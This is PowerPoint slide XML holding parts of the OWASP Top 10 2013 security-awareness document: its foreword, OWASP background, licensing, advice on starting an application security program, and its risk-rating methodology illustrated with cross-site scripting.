                        <a:t>, which now is far more popular, are both web application testing proxies. Such tools allow security analysts and developers to intercept web application requests, so they can figure out how the application works, and then submit test requests to see if the application responds securely to such requests. These tools are particularly effective at assisting in identifying XSS flaws, Authentication flaws, and Access Control flaws. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId15"/>
                        </a:rPr>
                        <a:t>ZAP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> even has an </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId16"/>
                        </a:rPr>
                        <a:t>active scanner</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> built in, and best of all it’s FREE!</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564335389"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="1143001"/>
          <a:ext cx="6858000" cy="8046718"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="6858000"/>
              </a:tblGrid>
              <a:tr h="380999">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
                        <a:t>Start</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> Your Application Security Program Now</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Application security is no longer optional. Between increasing attacks and regulatory pressures, organizations must establish an effective capability for securing their applications. Given the staggering number of applications and lines of code already in production, many organizations are struggling to get a handle on the enormous volume of vulnerabilities.   OWASP recommends that organizations establish an application security program to gain insight and improve security across their application portfolio.  Achieving application security requires many different parts of an organization to work together efficiently, including security and audit, software development, and business and executive management. It requires security to be visible, so that all the different players can see and understand the organization’s application security posture.  It also requires focus on the activities and outcomes that actually help improve enterprise security by reducing risk in the most cost effective manner.  Some of the key activities in effective application security programs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 name="Title 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What’s Next for Organizations</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 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+O</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="12" name="Diagram 11"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2409550570"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="-914400" y="2990125"/>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O</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>About OWASP</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4756929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tblGrid>
              <a:tr h="354169">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" kern="1200" dirty="0" smtClean="0"/>
                        <a:t>Copyright and License</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="lt1"/>
                        </a:solidFill>
                        <a:latin typeface="+mj-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Copyright © 2003 – 2013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This document is released under the Creative Commons Attribution ShareAlike 3.0 license. For any reuse or distribution, you must make it clear to others the license terms of this work.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="1371600"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pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 2">
            <a:hlinkClick r:id="rId4"/>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="152400" y="8517890"/>
            <a:ext cx="1046163" cy="37465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2006867580"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="1144986"/>
          <a:ext cx="3352800" cy="6779813"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3352800"/>
              </a:tblGrid>
              <a:tr h="380488">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Foreword</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="16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6399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Insecure software is undermining our financial, healthcare, defense, energy, and other critical infrastructure. As our digital infrastructure gets increasingly complex and interconnected, the difficulty of achieving application security increases exponentially. We can no longer afford to tolerate relatively simple security problems like those presented in this OWASP Top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goal of the Top 10 project is to raise </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>awareness</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> about application security by identifying some of the most critical risks facing organizations. The Top 10 project is referenced by many standards, books, tools, and organizations, including MITRE, PCI DSS, DISA, FTC, and </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>many more</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                        <a:t>This release of the OWASP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> Top 10 marks this project’s tenth anniversary of raising awareness of the importance of application security risks. The OWASP Top 10 was first released in 2003, with minor updates in 2004 and 2007. The 2010 version was revamped to prioritize by risk, not just prevalence. This 2013 edition follows the same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We encourage you to use the Top 10 to get your organization </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="sng" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>started</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> with application security. Developers can learn from the mistakes of other organizations. Executives should start thinking about how to manage the risk that software applications create in their enterprise.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0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:effectLst/>
                        <a:uLnTx/>
                        <a:uFillTx/>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In the long term, we encourage you to create an application security program that is compatible with your culture and technology. These programs come in all shapes and sizes, and you should avoid attempting to do everything prescribed by some process model. Instead, leverage your organization’s existing strengths to do and measure what works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We hope that the OWASP Top 10 is useful to your application security efforts. Please don’t hesitate to contact OWASP with your questions, comments, and ideas, either publicly to </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId7"/>
                        </a:rPr>
                        <a:t>owasp-topten</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId7"/>
                        </a:rPr>
                        <a:t>@lists.owasp.org</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                        <a:t> or privately to </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:hlinkClick r:id=""/>
                        </a:rPr>
                        <a:t>dave.wichers@owasp.org</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                        <a:t>.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </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56597487"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3429000" y="1143000"/>
          <a:ext cx="3429000" cy="6781800"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3429000"/>
              </a:tblGrid>
              <a:tr h="382079">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>About</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
                        <a:t> OWASP</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">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6399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Open Web Application Security Project (OWASP) is an open community dedicated to enabling organizations to develop, purchase, and maintain applications that can be trusted.  At OWASP you’ll find</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>free and open </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>…</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Application</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> security tools and standards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baseline="0" dirty="0" smtClean="0"/>
                        <a:t>Complete books on application security testing, secure code development, and secure code review</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Standard security controls and libraries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8"/>
                        </a:rPr>
                        <a:t>Local</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId8"/>
                        </a:rPr>
                        <a:t> chapters worldwide</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" baseline="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Cutting edge research</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9"/>
                        </a:rPr>
                        <a:t>Extensive conferences worldwide</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="100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10"/>
                        </a:rPr>
                        <a:t>Mailing lists</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Learn more at: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId11"/>
                        </a:rPr>
                        <a:t>https://www.owasp.org</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="10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All of the OWASP tools, documents, forums, and chapters are free and open to anyone interested in improving application security. We advocate approaching application security as a people, process, and technology problem, because the most effective approaches to application security require improvements in all of these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Similar to many open</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                        <a:t>source software projects, OWASP produces many types of materials in a collaborative, open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OWASP Foundation is the non-profit entity that ensures the project’s long-term success. Almost everyone associated with OWASP is a volunteer, including the OWASP Board, Global Committees, Chapter</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> Leaders, Project Leaders, and </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                        <a:t>project members. We support innovative</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> security research with grants and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Come join us!</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="100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10083183"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="1143000"/>
          <a:ext cx="6858000" cy="804672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It’s About</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> Risks, Not Weaknesses</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665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Although the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>2007</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                        <a:t> and earlier versions of the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>OWASP Top 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                        <a:t> focused on identifying the most common “vulnerabilities,” the OWASP Top 10 has always been organized around risks. This has caused some understandable confusion on</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> the part of people searching for an airtight weakness taxonomy. The </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>OWASP Top 10 for</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t> 2010</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                        <a:t> clarified</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> the risk-focus in the Top 10 by being very explicit about how threat agents, attack vectors, weaknesses, technical impacts, and business impacts combine to produce risks. This version of the OWASP Top 10 follows the same methodology.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Risk Rating methodology for the Top 10 is based on the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId7"/>
                        </a:rPr>
                        <a:t>OWASP Risk Rating Methodology</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                        <a:t>.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId7"/>
                        </a:rPr>
                        <a:t>OWASP Risk Rating Methodology</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                        <a:t> defines numerous factors to help calculate</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> the risk of an identified vulnerability. However, the Top 10 must talk about generalities, rather than specific vulnerabilities in real applications. Consequently, we can never be as precise as system owners can be when calculating risks for their application(s). You are best equipped to judge the importance of your applications and data, what your threat agents are, and how your system has been built and is being operated.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Our methodology includes three</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                        <a:t>likelihood factors for each</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> weakness </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>prevalence</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                        <a:t>, detectability,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> and ease of exploit</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                        <a:t>) and one</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> impact factor (technical impact). </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                        <a:t>The prevalence of a weakness is </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>a factor that you typically don’t have to calculate. For prevalence data, we have been supplied prevalence statistics from a number of different organizations (as referenced in the Acknowledgements section on page 3) and we have averaged their data together to come up with a Top 10 likelihood of existence list by prevalence. This data was then combined with the other two likelihood factors (detectability and ease of exploit) to calculate a likelihood rating for each weakness. This was then multiplied by our estimated average technical impact for each item to come up with an overall risk ranking for each item in the Top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also does not take into account the actual impact on your business</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="sng" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>Your organization</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> will have to decide how much security risk from applications </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="sng" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>the organization</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="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following illustrates our calculation of the risk for A3: Cross-Site Scripting, as an example. XSS is so prevalent it warranted the only ‘VERY WIDESPREAD’ prevalence value of 0. All other risks ranged from widespread to uncommon (value 1 to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3" name="Text Placeholder 1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24058667"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="121920" y="6533082"/>
          <a:ext cx="6629400" cy="2606453"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1104900"/>
                <a:gridCol w="1104900"/>
                <a:gridCol w="1104900"/>
                <a:gridCol w="1104900"/>
                <a:gridCol w="1104900"/>
                <a:gridCol w="1104900"/>
              </a:tblGrid>
              <a:tr h="625253">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1782">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>App</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="14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200" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>App / Business</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> Specific</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2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9418">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>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smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>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0</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0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27650" name="Picture 2"/>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31326" y="7798415"/>
            <a:ext cx="2322514" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28" name="Picture 2"/>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28606" y="8382000"/>
            <a:ext cx="2322514" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Rectangle 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3819206" y="8758535"/>
            <a:ext cx="340158" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="47" name="Group 46"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="238836" y="6572731"/>
            <a:ext cx="6380328" cy="585604"/>
            <a:chOff x="304800" y="1014596"/>
            <a:chExt cx="6380328" cy="585604"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="48" name="Group 47"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="304800" y="1014596"/>
              <a:ext cx="6380328" cy="585604"/>
              <a:chOff x="304800" y="997424"/>
              <a:chExt cx="6380328" cy="585604"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="51" name="Rectangle 116"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2961564" y="1077920"/>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2" name="Group 63"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="476250" y="997424"/>
                <a:ext cx="139700" cy="304800"/>
                <a:chOff x="96" y="1344"/>
                <a:chExt cx="288" cy="624"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="61"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2"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5"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3" name="AutoShape 163"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1447800" y="1089827"/>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4" name="AutoShape 85"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4800600" y="1054093"/>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5" name="AutoShape 108"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
                <a:endCxn id="53" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="821288" y="1263652"/>
                <a:ext cx="626512" cy="4769"/>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7" name="AutoShape 140"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
                <a:stCxn id="51" idx="3"/>
                <a:endCxn id="54" idx="2"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3981932" y="1268420"/>
                <a:ext cx="81866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8"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9" name="AutoShape 142"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5923128" y="1077920"/>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60" name="AutoShape 149"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
                <a:stCxn id="54" idx="4"/>
                <a:endCxn id="59" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="5486400" y="1268420"/>
                <a:ext cx="43672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3" idx="3"/>
                <a:endCxn id="50" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="2286000" y="1266037"/>
